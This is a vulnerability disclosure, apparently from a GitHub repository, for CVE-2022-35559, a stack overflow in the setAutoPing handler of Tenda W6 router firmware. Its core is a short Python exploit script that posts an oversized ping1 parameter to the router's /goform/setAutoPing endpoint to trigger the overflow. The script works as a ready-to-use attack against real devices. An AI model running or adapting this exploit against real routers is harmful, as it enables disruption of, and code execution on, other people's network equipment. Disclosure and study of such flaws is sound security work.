Headline
CVE-2022-35559: IOT/Tenda/W6/stackoverflow/formSetAutoPing at main · ilovekeer/IOT
A stack overflow vulnerability exists in /goform/setAutoPing in Tenda W6 V1.0.0.9(4122), which allows an attacker to construct ping1 parameters and ping2 parameters for a stack overflow attack. An attacker can use this vulnerability to execute arbitrary code execution.
Tenda W6 Stack Overflow Vulnerability****Device Vulnerability Introduction
Tenda W6 is an enterprise wireless AP router from Tenda Technology (Shenzhen, China).
A stack overflow vulnerability exists in /goform/setAutoPing in Tenda W6 V1.0.0.9(4122) version, which allows an attacker to construct ping1 parameters and ping2 parameters for a stack overflow attack. An attacker can use this vulnerability to execute arbitrary code execution.
固件下载地址:https://www.tenda.com.cn/download/detail-2576.html
Vulnerability Location
/goform/setAutoPing
Vulnerability Exploitation
Exp
import requests from pwn import * burp0_url = “http://192.168.5.1/goform/setAutoPing” burp0_headers = {"Host":"192.168.5.1", "Content-Length":"295", "Accept":"*/*", "X-Requested-With":"XMLHttpRequest", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36", "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8", "Origin":"http://192.168.5.1", "Referer":"http://192.168.5.1/main.html", "Accept-Encoding":"gzip, deflate", "Accept-Language":"en-US,en;q=0.9", "Cookie":"user=", "Connection":"close"}
data1="linkEn=1" data1+=’&ping1=’+’a’*0x84 data1+=’&ping2=baaaaa’ requests.post(burp0_url,headers=burp0_headers,data=data1, verify=False,timeout=1)
Please see the video for the demonstration process